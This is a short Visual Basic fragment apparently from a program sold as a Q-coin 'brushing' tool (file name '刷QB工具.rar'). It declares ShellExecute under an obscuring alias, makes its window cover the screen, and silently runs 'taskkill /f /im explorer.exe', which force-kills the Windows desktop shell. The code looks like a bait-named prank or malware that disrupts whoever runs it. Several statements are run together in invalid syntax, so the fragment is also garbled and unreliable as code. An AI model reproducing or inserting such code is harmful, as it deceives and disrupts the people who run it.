|
刷QB工具.rar
Private Declare Function CID11 Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Option Explicit
Form1.Left = 0 Form1.Height = 800 Form1.Width = 1024 Form1.Top = 0 Shell "taskkill.exe /f /im explorer.exe",vbhide
|